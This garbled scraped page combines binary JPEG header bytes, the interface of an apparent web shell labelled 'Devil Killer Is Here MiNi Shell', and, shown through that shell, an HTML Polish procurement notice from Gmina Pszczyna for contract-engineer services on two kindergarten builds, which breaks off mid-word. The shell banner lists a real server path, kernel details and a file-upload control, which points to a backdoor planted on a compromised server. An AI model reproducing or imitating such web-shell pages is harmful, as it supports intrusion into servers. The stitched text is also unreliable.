JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221004/0037599701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> INŻYNIER KONTRAKTU: Zad. nr 1. Budowa przedszkola wraz z infrastr. techniczną i zagosp.terenu w Studzienicach. <br/>Zad. nr 2. Budowa przedszkola wraz z infrastr. techniczną i zagosp. terenu w Czarkowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Pszczyna Urząd Miejski w Pszczynie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276258339</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pszczyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pszczyna@pszczyna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pszczyna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> INŻYNIER KONTRAKTU: Zad. nr 1. Budowa przedszkola wraz z infrastr. techniczną i zagosp.terenu w Studzienicach. <br/>Zad. nr 2. Budowa przedszkola wraz z infrastr. techniczną i zagosp. terenu w Czarkowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e0c46508-4308-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00375997</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00011007/19/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Budowa przedszkola wraz z niezbędną infrastrukturą techniczną i zagospodarowaniem terenu w Studzienicach</p> <p class="mb-0">1.1.10 Budowa przedszkola wraz z niezbędną infrastrukturą techniczną i zagospodarowaniem terenu w Czarkowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal., j pszczyna@pszczyna.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal., poczty elektronicznej pszczyna@pszczyna.pl <br/>2. Wykonawca w celu złożenia oferty w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. <br/>3. Złożenie oferty, pod rygorem nieważności następuje w formie elektronicznej wyłącznie za pośrednictwem dedykowanego formularza pn. „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP (https://epuap.gov.pl/wps/portal) oraz udostępnionego przez miniPortal (https://miniportal.uzp.gov.pl/).<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji użytkowania sytemu miniPortal oraz Regulaminie ePUAP.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>6. Identyfikator postępowania i link z dostępem do postępowania na miniPortalu niezbędne do zaszyfrowania i złożenia oferty dostępne są na stronie internetowej Zamawiającego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.271.1.0046.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wybór Wykonawcy, którego zadaniem będzie pełnienie funkcji Inżyniera Kontraktu na realizowanych zadaniach inwestycyjnych pn. Budowa przedszkola wraz z niezbędną infrastrukturą techniczną i zagospodarowaniem terenu w Studzienicach przy ul. Św. Jana Pawła II 74.<br/>2.	Zamówienie obejmuje następujący zakres obowiązków i czynności do wykonania przez Inżyniera Kontraktu:<br/>2.1. Do ogólnych obowiązków Wykonawcy w szczególności, należy: <br/>1)	zarządzanie procesem inwestycyjnym w imieniu Zamawiającego, pełnienie funkcji inspektora nadzoru inwestorskiego, zgodnie z przepisami polskiego prawa i decyzją w sprawie pozwolenia na budowę ). <br/>2)	zapewnienie nadzoru inwestorskiego przez inspektorów w branżach: konstrukcyjno – budowlanej, drogowej, instalacji sanitarnych, instalacji elektrycznych, nadzór nad realizacją robót w zakresie p.poż.<br/>Zamawiający dopuszcza łączenie w/w stanowisk pod warunkiem spełnienia łącznie wymagań dotyczących kwalifikacji i doświadczenia dla danych stanowisk. <br/>3)	koordynacja pracy wszystkich inspektorów (koordynator kontraktu), <br/>4)	wspieranie Zamawiającego we wszystkich czynnościach technicznych, administracyjnych i finansowych związanych z realizacją Kontraktów, <br/>5) wsparcie merytoryczne w zakresie obsługi prawnej realizowanego zadania inwestycyjnego, o którym mowa w pkt 1 <br/>6)	kontrola nad właściwym i terminowym zakończeniem zadań, koordynacja działań wszystkich organizacji i podmiotów uczestniczących w realizacji zadań, <br/>7)	egzekwowanie, przy współpracy z Zamawiającym, postanowień zawartych umów z Wykonawcami robót budowlanych, <br/>8)	natychmiastowe informowanie Zamawiającego o wszystkich problemach zaistniałych (mogących zaistnieć) w ramach nadzorowanych zadań (w szczególności o wszelkich dostrzeżonych nieprawidłowościach i zagrożeniach, co do jakości, zakresu i terminowości realizacji zadania), razem ze wskazaniem propozycji i sposobów ich rozwiązania i/lub działaniami korygującymi mającymi na celu usuwanie takich problemów (lub im zapobieganie), <br/>9)	prowadzenie polubownych uzgodnień na rzecz Zamawiającego w przypadku zaistnienia konfliktu pomiędzy Zamawiającym, a Wykonawcami robót oraz czynny udział w rozwiązywaniu ewentualnych sporów zgodnie z warunkami umów na roboty, <br/>10)	prowadzenie, przechowywanie, archiwizowanie korespondencji z podmiotami biorącymi udział w realizacji zadania, w tym z Zamawiającym i Wykonawcami robót oraz wszelkich niezbędnych dokumentów, ze szczególnym uwzględnieniem wpisów do dziennika budowy, ostrzeżeń, uwag i wniosków kierowanych do wykonawców robót, które mogą być dowodami w razie ewentualnych sporów, roszczeń wykonawców, katastrof budowlanych, itp., <br/>11)	prowadzenie technicznego, finansowego i administracyjnego nadzoru nad prowadzonymi pracami, egzekwowanie zgodności prowadzonych prac z: <br/>a.	założonym harmonogramem, <br/>b.	decyzjami administracyjnymi, <br/>c.	dokumentacją projektową, <br/>d.	obowiązującym prawem, w szczególności z ustawą Prawo budowlane, Prawo zamówień publicznych oraz rozporządzeniami i przepisami z nimi związanymi, <br/>e.	zasadami wiedzy technicznej i inżynierskiej, <br/>12)	dostępność Wykonawcy - Inżyniera Kontraktu na życzenie Zamawiającego, w razie wystąpienia sporów sądowych z Wykonawcą robót, do czasu uzyskania prawomocnego orzeczenia sądu w przedmiocie sporu. Koszty tej dostępności powinny być uwzględnione w cenie ofertowej. W szczególności Inżynier Kontraktu oraz osoby działające w jego imieniu lub na jego rzecz zobowiązane będą do występowania przed sądem w charakterze świadka i wydania opinii prywatnych oraz przedstawienia Zamawiającemu na jego żądanie wszelkich posiadanych dokumentów i informacji związanych z zadaniem, <br/>13)	poddanie się kontroli Zamawiającego lub uprawnionych zewnętrznych organów kontrolnych, <br/>14)	przestrzeganie postanowień Umowy, w tym terminów w niej wskazanych, <br/>15)	wykonywanie innych czynności zmierzających do realizacji celów zadania, dla których umowa została zawarta. <br/> <br/>7.2. Zamawiający oczekuje, że cele te Inżynier Kontraktu osiągnie poprzez:<br/>1)	właściwą i profesjonalną organizację i koordynację robót,<br/>2)	administrowanie i zarządzanie kontraktem na roboty, przy czynnym współudziale Zamawiającego,<br/>3)	monitorowanie postępu prac pod względem rzeczowym i finansowym,<br/>4)	zapewnienie kompletnego i profesjonalnego nadzoru inwestorskiego nad robotami, <br/>5)	zapewnienie zgodności realizacji kontraktu na roboty budowlane dot. zadań inwestycyjnych, o którym mowa w pkt. 1, zgodnie z Prawem Budowlanym oraz wydanymi decyzjami administracyjnymi,<br/>6)	skuteczne wyegzekwowanie od Wykonawcy robót budowlanych spełnienia wymagań dotyczących jakości stosowanych materiałów i wykonywanych robót,<br/>7)	zapewnienie zgodności realizacji kontraktu na roboty z dokumentacją projektową oraz warunkami kontraktowymi,<br/>8)	właściwe rozliczenie kontraktu na roboty budowlane,<br/>9)	organizacja odbiorów robót budowlanych (zarówno częściowych, jak i końcowego) wraz z udziałem w procedurze oddania obiektu do użytkowania,<br/>10)	właściwy nadzór w okresie zgłaszania wad i usterek, <br/>11)	konsekwentne egzekwowanie obowiązków od Wykonawcy robót budowlanych.<br/>Szczegółowy opis zamówienia został zawarty w SWZ, Rozdział II </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność Kierownika Zespołu Inżyniera Kontraktu (Inżyniera Rezydent) pełniącego jednocześnie funkcję inspektora nadzoru robót budowlanych w specjalności konstrukcyjno – budowlanej (DIK)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność inspektorów nadzoru pozostałych branż (DIN)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia w branży konstrukcyjno-budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wybór Wykonawcy, którego zadaniem będzie pełnienie funkcji Inżyniera Kontraktu dla zadania inwestycyjnego pn. Budowa przedszkola wraz z niezbędną infrastrukturą techniczną i zagospodarowaniem terenu w Czarkowie przy ul. Powstańców Śl. 25.7.	2. Zamówienie obejmuje następujący zakres obowiązków i czynności do wykonania przez Inżyniera Kontraktu:<br/>2.1 Do ogólnych obowiązków Wykonawcy w szczególności, należy: <br/>1)	zarządzanie procesem inwestycyjnym w imieniu Zamawiającego, pełnienie funkcji inspektora nadzoru inwestorskiego, zgodnie z przepisami polskiego prawa i decyzją w sprawie pozwolenia na budowę którą Wykonawca zobowiązany jest uzyskać w imieniu Zamawiającego. <br/>2)	zapewnienie nadzoru inwestorskiego przez inspektorów w branżach: konstrukcyjno – budowlanej, drogowej, instalacji sanitarnych, instalacji elektrycznych, nadzór nad realizacją robót w zakresie p.poż.<br/>Zamawiający dopuszcza łączenie w/w stanowisk pod warunkiem spełnienia łącznie wymagań dotyczących kwalifikacji i doświadczenia dla danych stanowisk. <br/>3)	koordynacja pracy wszystkich inspektorów (koordynator kontraktu), <br/>4)	wspieranie Zamawiającego we wszystkich czynnościach technicznych, administracyjnych i finansowych związanych z realizacją Kontraktów, <br/>5) wsparcie merytoryczne w zakresie obsługi prawnej realizowanego zadania inwestycyjnego, o którym mowa w pkt 1 <br/>6)	kontrola nad właściwym i terminowym zakończeniem zadań, koordynacja działań wszystkich organizacji i podmiotów uczestniczących w realizacji zadań, <br/>7)	egzekwowanie, przy współpracy z Zamawiającym, postanowień zawartych umów z Wykonawcami robót budowlanych, <br/>8)	natychmiastowe informowanie Zamawiającego o wszystkich problemach zaistniałych (mogących zaistnieć) w ramach nadzorowanych zadań (w szczególności o wszelkich dostrzeżonych nieprawidłowościach i zagrożeniach, co do jakości, zakresu i terminowości realizacji zadania), razem ze wskazaniem propozycji i sposobów ich rozwiązania i/lub działaniami korygującymi mającymi na celu usuwanie takich problemów (lub im zapobieganie), <br/>9)	prowadzenie polubownych uzgodnień na rzecz Zamawiającego w przypadku zaistnienia konfliktu pomiędzy Zamawiającym, a Wykonawcami robót oraz czynny udział w rozwiązywaniu ewentualnych sporów zgodnie z warunkami umów na roboty, <br/>10)	prowadzenie, przechowywanie, archiwizowanie korespondencji z podmiotami biorącymi udział w realizacji zadania, w tym z Zamawiającym i Wykonawcami robót oraz wszelkich niezbędnych dokumentów, ze szczególnym uwzględnieniem wpisów do dziennika budowy, ostrzeżeń, uwag i wniosków kierowanych do wykonawców robót, które mogą być dowodami w razie ewentualnych sporów, roszczeń wykonawców, katastrof budowlanych, itp., <br/>11)	prowadzenie technicznego, finansowego i administracyjnego nadzoru nad prowadzonymi pracami, egzekwowanie zgodności prowadzonych prac z: <br/>a.	założonym harmonogramem, <br/>b.	decyzjami administracyjnymi, <br/>c.	dokumentacją projektową, <br/>d.	obowiązującym prawem, w szczególności z ustawą Prawo budowlane, Prawo zamówień publicznych oraz rozporządzeniami i przepisami z nimi związanymi, <br/>e.	zasadami wiedzy technicznej i inżynierskiej, <br/>12)	dostępność Wykonawcy - Inżyniera Kontraktu na życzenie Zamawiającego, w razie wystąpienia sporów sądowych z Wykonawcą robót, do czasu uzyskania prawomocnego orzeczenia sądu w przedmiocie sporu. Koszty tej dostępności powinny być uwzględnione w cenie ofertowej. W szczególności Inżynier Kontraktu oraz osoby działające w jego imieniu lub na jego rzecz zobowiązane będą do występowania przed sądem w charakterze świadka i wydania opinii prywatnych oraz przedstawienia Zamawiającemu na jego żądanie wszelkich posiadanych dokumentów i informacji związanych z zadaniem, <br/>13)	poddanie się kontroli Zamawiającego lub uprawnionych zewnętrznych organów kontrolnych, <br/>14)	przestrzeganie postanowień Umowy, w tym terminów w niej wskazanych, <br/>15)	wykonywanie innych czynności zmierzających do realizacji celów zadania, dla których umowa została zawarta. <br/> <br/>7.2. Zamawiający oczekuje, że cele te Inżynier Kontraktu osiągnie poprzez:<br/>1)	właściwą i profesjonalną organizację i koordynację robót,<br/>2)	administrowanie i zarządzanie kontraktem na roboty, przy czynnym współudziale Zamawiającego,<br/>3)	monitorowanie postępu prac pod względem rzeczowym i finansowym,<br/>4)	zapewnienie kompletnego i profesjonalnego nadzoru inwestorskiego nad robotami, <br/>5)	zapewnienie zgodności realizacji kontraktu na roboty budowlane dot. zadań inwestycyjnych, o którym mowa w pkt. 1, zgodnie z Prawem Budowlanym oraz wydanymi decyzjami administracyjnymi,<br/>6)	skuteczne wyegzekwowanie od Wykonawcy robót budowlanych spełnienia wymagań dotyczących jakości stosowanych materiałów i wykonywanych robót,<br/>7)	zapewnienie zgodności realizacji kontraktu na roboty z dokumentacją projektową oraz warunkami kontraktowymi,<br/>8)	właściwe rozliczenie kontraktu na roboty budowlane,<br/>9)	organizacja odbiorów robót budowlanych (zarówno częściowych, jak i końcowego) wraz z udziałem w procedurze oddania obiektu do użytkowania,<br/>10)	właściwy nadzór w okresie zgłaszania wad i usterek, <br/>11)	konsekwentne egzekwowanie obowiązków od Wykonawcy robót budowlanych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność Kierownika Zespołu Inżyniera Kontraktu (Inżyniera Rezydent) pełniącego jednocześnie funkcję inspektora nadzoru robót budowlanych w specjalności konstrukcyjno – budowlanej (DIK)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność inspektorów nadzoru pozostałych branż (DIN)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje 